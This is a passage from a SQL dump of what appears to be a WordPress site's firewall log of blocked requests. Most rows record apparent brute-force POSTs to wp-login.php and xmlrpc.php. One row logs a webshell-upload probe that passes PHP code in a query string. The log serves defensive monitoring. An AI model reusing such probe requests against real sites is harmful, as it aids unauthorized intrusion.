Safari\\/537.36\"}','DEN2qf1SlHmI5eRa7ptULVni',0,1664798664.2230,1307,'','POST',403,0,515,0,1,'',0),('107.189.14.89',1807552089,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','TQnvlsCbI15MWFJzi03XejhE',0,1664803566.8302,17587,'','POST',403,0,600,0,1,'',0),('185.183.122.143',3115809423,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lYybIp1onMtQd97sTu56GS8r',0,1664802601.6382,615,'','POST',403,0,600,0,1,'',0),('190.169.30.9',3198754313,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vHTI14lBQk0cWw9jpO2JN8Px',0,1664802584.3475,535,'','POST',403,0,600,0,1,'',0),('185.2.4.140',3103917196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','tJKk8RF05cnyg76QzrSPLxau',0,1664805970.8353,565,'','POST',403,0,515,0,1,'',0),('43.129.81.132',729895300,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','fF3aQjdmRIsXLZxYJhkBW2qp',0,1664854504.1061,1475,'','POST',403,0,515,0,1,'',0),('185.210.145.8',3117584648,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','kaPUmAZfI63xYts84iJbXyWF',0,1664854494.5884,3006,'','POST',403,0,515,0,1,'',0),('104.251.216.88',1761335384,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','W5lXZasMhcSdrYnOLIkPUV1T',0,1664854495.2068,2984,'','POST',403,0,515,0,1,'',0),('202.61.232.79',3393054799,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','8AiuzpgVmjS0YWrGU7BXkyNd',0,1664854494.9857,2595,'','POST',403,0,515,0,1,'',0),('205.185.116.156',3451483292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D201 Safari\\/9537.53\"}','eJQnwSAifzj8NH4OlUGbVW0D',0,1664890944.1337,13326,'','POST',403,0,600,0,1,'',0),('103.130.219.13',1736629005,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','9kF5JYrShjq27H1Cwu8QcbAd',0,1664890603.7647,576,'','POST',403,0,600,0,1,'',0),('208.113.180.18',3497112594,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','NCZhxr3GavDYVyOcmu17tH4R',0,1664890576.0833,17757,'','POST',403,0,600,0,1,'',0),('167.71.234.124',2806508156,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','gMbNwtHBQX1CJiAuO3KT7mea',0,1664889737.8708,496,'','POST',403,0,600,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','Bh8wxRPkSIWY4lyUvXOGru7o',0,1664889712.4687,17889,'','POST',403,0,600,0,1,'',0),('51.255.81.60',872370492,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','xsvHZDEeJiP8NX4CAyrdcgat',0,1664888872.4879,513,'','POST',403,0,600,0,1,'',0),('150.109.148.216',2523763928,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.97 Safari\\/537.36\"}','fQSJpCehVb0Rs9MWA7n2dHLc',0,1664888849.5715,18237,'','POST',403,0,600,0,1,'',0),('208.109.54.127',3496818303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.84 Safari\\/537.36\"}','8Sv4zDhf7i3JaF1RmqLcEtyk',0,1664888016.7113,17218,'','POST',403,0,600,0,1,'',0),('69.163.186.158',1168358046,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','ANDqs3Rpa6tIjfBe47rCliTZ',0,1664887137.6796,17680,'','POST',403,0,600,0,1,'',0),('209.141.48.210',3515691218,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','kF7J3DZGguSWM6ImberRhYpE',0,1664886776.8675,1320,'','POST',403,0,600,0,1,'',0),('185.2.4.140',3103917196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','JgTav5bQ0XeHmApC2OfFkVid',0,1664886330.8502,476,'','POST',403,0,515,0,1,'',0),('159.65.241.136',2671899016,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','w0uKSdi71rmICDU5N8Wl6tcE',0,1664886329.7307,481,'','POST',403,0,515,0,1,'',0),('162.215.12.182',2732002486,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','CaXjDEIT0QPBi4ywScfp12JU',0,1664886324.8196,518,'','POST',403,0,515,0,1,'',0),('84.54.23.178',1412831154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','DIKCRJXpLH6dnoeFylcVW97t',0,1664886319.2082,519,'','POST',403,0,515,0,1,'',0),('173.236.152.148',2917963924,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','9MJKdBYkzGyxpv6DQWeHVEO0',0,1664886315.0769,486,'','POST',403,0,600,0,1,'',0),('80.74.145.155',1347064219,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','r98bcDahLm7w5TyYMj6GSNdk',0,1664886311.1026,2310,'','POST',403,0,515,0,1,'',0),('152.228.208.88',2565132376,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','IWYBmCzrRPUeO0NV2EZHMjxi',0,1664886289.1521,1560,'','POST',403,0,600,0,1,'',0),('209.141.36.190',3515688126,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit\\/537.77.4 (KHTML, like Gecko) Version\\/6.1.5 Safari\\/537.77.4\"}','6MhWGHVEAjedFy1PUDbt9wgT',0,1664885635.3441,1389,'','POST',403,0,600,0,1,'',0),('188.166.236.35',3165056035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','q3VhEO06A4zBTrbodcp18tfk',0,1664885448.5827,1183,'','POST',403,0,600,0,1,'',0),('162.213.249.210',2731932114,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','lZFHgPvhVsxbjri8WunoXU4f',0,1664885364.2666,599,'','POST',403,0,515,0,1,'',0),('148.72.61.12',2487762188,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','2tVshe1XSHYdGjzIrl0n6JO3',0,1664885359.9746,552,'','POST',403,0,515,0,1,'',0),('198.46.93.129',3324927361,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','GWE6TD3SuKYrAMovQa21OzcC',0,1664885355.0240,1263,'','POST',403,0,515,0,1,'',0),('198.98.48.183',3328323767,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','FXomDQEaV3tAwlexK5c9bS7Z',0,1664885149.4680,1246,'','POST',403,0,600,0,1,'',0),('23.97.183.204',392280012,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','zVp9Q3xMXq7jiZ4lLAbIBDyP',0,1664884678.7841,849,'','POST',403,0,515,0,1,'',0),('162.241.126.46',2733735470,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','nPrEb8AqWLtgcMZ3FOwkhJyo',0,1664884677.6853,1644,'','POST',403,0,515,0,1,'',0),('148.153.64.181',2493071541,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','0rvzQabFUTxLhHnsVIqYp41t',0,1664884676.6908,2042,'','POST',403,0,515,0,1,'',0),('81.88.52.221',1364735197,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','WYkQIdHEgyFBstA48CwmL6lX',0,1664884625.1731,465,'','POST',403,0,600,0,1,'',0),('159.69.8.8',2672101384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','xHW517UXSsz8njY0VKTPoQaO',0,1664884599.3153,17689,'','POST',403,0,600,0,1,'',0),('95.217.129.44',1608089900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','3BxPRrzvb4jCipulh5KcgLtn',0,1664883774.9723,1175,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','56k2ZhnN7oQvpmLM4D1eSOUq',0,1664883749.2418,2567,'','POST',403,0,600,0,1,'',0),('194.38.20.161',3257275553,'','http://cteisys.com/wp-content/themes/photocrati/admin/scripts/scripts-update.php','','{\"1\":\"ALittle Client\"}','INmodQgvuxwOWAbPG6f8es1F',0,1664883330.8913,4590,'','GET',403,0,700,0,1,'',0),('157.230.15.115',2649100147,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.89 Safari\\/537.36\"}','YUwaz0JHKM4PeupFbL3DVxBc',0,1664882918.0660,534,'','POST',403,0,600,0,1,'',0),('5.101.157.187',90545595,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','SHa14bCEA08nxkqNBdsW25gZ',0,1664882892.8418,3014,'','POST',403,0,600,0,1,'',0),('198.98.50.216',3328324312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit\\/538.46 (KHTML, like Gecko) Version\\/8.0 Safari\\/538.46\"}','pe2iznYrJUBXvglc6S1ad9Kb',0,1664882535.8878,461,'','POST',403,0,600,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','7m3kSYeEPOQlUGDIc80K2pau',0,1664882058.4968,498,'','POST',403,0,600,0,1,'',0),('165.232.180.174',2783491246,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','hAxI81LW3QGRKCkX2bp7Ptms',0,1664882032.8273,18605,'','POST',403,0,600,0,1,'',0),('208.113.153.235',3497105899,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','qFAHiI6uzUxmXVtp97KDhYOR',0,1664881202.8182,1836,'','POST',403,0,600,0,1,'',0),('165.232.180.174',2783491246,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','j9KoxV2LWlNtSps0qhwTMu84',0,1664881178.6173,17451,'','POST',403,0,600,0,1,'',0),('87.236.20.5',1475089413,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','zb1cJrLCjRMfgZsBlOHKYmG5',0,1664880355.3294,1396,'','POST',403,0,600,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','yD1UdX4rOhnukL7iQ0cCYZaF',0,1664880330.7237,11201,'','POST',403,0,600,0,1,'',0),('208.113.171.103',3497110375,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','ACwexNKBIOj9DTnFWUulQpf2',0,1664879508.1647,1354,'','POST',403,0,600,0,1,'',0),('207.154.248.39',3483039783,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','U2ZSKnQAEGruJwLVzWobNmIT',0,1664879484.3672,1849,'','POST',403,0,600,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','xD3zM7u8wyS04NJmP5rldno2',0,1664879397.9558,563,'','POST',403,0,515,0,1,'',0),('150.136.181.65',2525541697,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','vX1JqW8N0hQysRCLKSrM9xjw',0,1664879393.7406,582,'','POST',403,0,515,0,1,'',0),('81.88.52.166',1364735142,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Bcg3DUOEMVWv9enrisfy7Njz',0,1664879391.4363,1299,'','POST',403,0,515,0,1,'',0),('52.172.51.19',883700499,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','OeNg40XxEKPbmjY1GMVJyFuL',0,1664879366.8643,18223,'','POST',403,0,515,0,1,'',0),('51.38.132.211',858162387,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','if1ZUt4VgOD8wdQ6BxC9qLyK',0,1664879368.0421,16956,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','9V5loZ0yIQhrj2g8Pvuwnmpd',0,1664879376.2272,8766,'','POST',403,0,515,0,1,'',0),('75.119.135.205',1266124749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','oyx8vQGHtebWp0VjB5RY6AEq',0,1664878662.0667,555,'','POST',403,0,600,0,1,'',0),('13.81.59.92',223427420,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.167 Safari\\/537.36\"}','yaE35jgUYQM047C8VGxndbuT',0,1664878635.2784,18023,'','POST',403,0,600,0,1,'',0),('68.183.93.28',1152867612,'','http://cteisys.com/wp-22.php?sfilename=on.php&sfilecontent=<%3F%3D409723%2A20%3B&supfiles=on.php','','{\"1\":\"Mozilla\\/5.0 (Android 10; Mobile; rv:68.0) Gecko\\/68.0 Firefox\\/68.0\"}','qCo7GycHiBZn2KQMSmFu5EWY',0,1664877922.4723,11706,'','GET',403,0,700,0,1,'',0),('198.46.81.7',3324924167,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','pNCAhscZWQr7byEgmTS4qXH6',0,1664877746.2693,17933,'','POST',403,0,600,0,1,'',0),('104.244.77.192',1760841152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','LnhXfmdIScaJVuAEWM1wqlFj',0,1664877215.8320,946,'','POST',403,0,600,0,1,'',0),('159.89.109.117',2673438069,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','jcBlQoaw4PDTtRJ51y2xOgF7',0,1664876901.7107,509,'','POST',403,0,600,0,1,'',0),('147.182.249.22',2478242070,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','9tOa0HIR6jC81wlizVFBrT4u',0,1664876876.7273,18485,'','POST',403,0,600,0,1,'',0),('51.91.220.143',861658255,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','7M0J1uv6hFOqaDwUPlzELXfb',0,1664876063.5145,507,'','POST',403,0,600,0,1,'',0),('173.247.248.10',2918709258,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.106 Safari\\/537.36\"}','6TFzxfuHho52rQcL9eXl3tPJ',0,1664876040.9847,17301,'','POST',403,0,600,0,1,'',0),('128.199.207.63',2160578367,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','L3ihraZbuvAF15xUmYBTPD8g',0,1664875903.3071,532,'','POST',403,0,515,0,1,'',0),('157.245.71.145',2650097553,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','rjkhdn3MfDCtpKx1gvu7eaSP',0,1664875902.0878,565,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','uAHIk6v8VPU4ZyQM9EjFX5Bd',0,1664875895.6103,605,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','LfrpmGRg92dyXKU83FIwTcaP',0,1664875885.5419,534,'','POST',403,0,515,0,1,'',0),('164.52.208.110',2754924654,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','Jhd9xnRDGcpPLiBOA8Sa3l0k',0,1664875881.4035,503,'','POST',403,0,515,0,1,'',0),('173.82.16.112',2907836528,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','6Yi4HVA9RIM7Pw1GQKqdlbh2',0,1664875856.7583,18598,'','POST',403,0,515,0,1,'',0),('91.249.163.48',1543086896,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','5ozmkvbKHRIYLxfXtrCFpSOi',0,1664875231.1436,454,'','POST',403,0,600,0,1,'',0),('35.192.104.56',599812152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','kQLvt0Uhz8SNKaMIA3CpE6gO',0,1664875206.5064,17780,'','POST',403,0,600,0,1,'',0),('209.141.55.206',3515693006,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','BODZSbfzmcxQaJGv0NU7HKoC',0,1664873499.3933,1447,'','POST',403,0,600,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','WVGjqiT1c4HunyE9zeUQ3psX',0,1664872331.1376,528,'','POST',403,0,515,0,1,'',0),('208.109.79.3',3496824579,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','uB1hPJvIYoTdZnl3i7CWAbqU',0,1664872319.5149,971,'','POST',403,0,515,0,1,'',0),('138.201.61.46',2328444206,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','O3GCuwILHNZA4zsVeXr7dpEY',0,1664872319.0301,1079,'','POST',403,0,515,0,1,'',0),('111.229.185.64',1877326144,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','j1OuSJxUGnAIb0TLKRfMgQqF',0,1664872314.1949,542,'','POST',403,0,515,0,1,'',0),('46.28.3.42',773587754,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','z5Q8ID1G2SJRqs0nthlHjoYO',0,1664872310.4205,516,'','POST',403,0,515,0,1,'',0),('210.245.90.233',3539294953,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','Il4E2DHPCS8Rzr6jpqGTKWJ7',0,1664872308.9346,1296,'','POST',403,0,515,0,1,'',0),('13.64.60.246',222313718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','2e0c8shnwzIKUjZtu17kFGmR',0,1664872300.1267,565,'','POST',403,0,515,0,1,'',0),('142.93.168.95',2388502623,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','e9y1P3bT0JSi56f2uYHtoEKV',0,1664872279.0822,15616,'','POST',403,0,515,0,1,'',0),('80.74.145.155',1347064219,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','17pGTkUdugQNbBY8jAEfSyiH',0,1664872289.9882,4704,'','POST',403,0,515,0,1,'',0),('81.88.53.41',1364735273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','3n0fsDZkMpTt7PEGyualx5dH',0,1664872276.0283,18667,'','POST',403,0,515,0,1,'',0),('209.141.49.253',3515691517,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Ubuntu Chromium\\/34.0.1847.116 Chrome\\/34.0.1847.116 Safari\\/537.36\"}','85P0eSDZvCNydLQqcbKwX9iU',0,1664870674.3699,1491,'','POST',403,0,600,0,1,'',0),('178.62.213.234',2990462442,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like 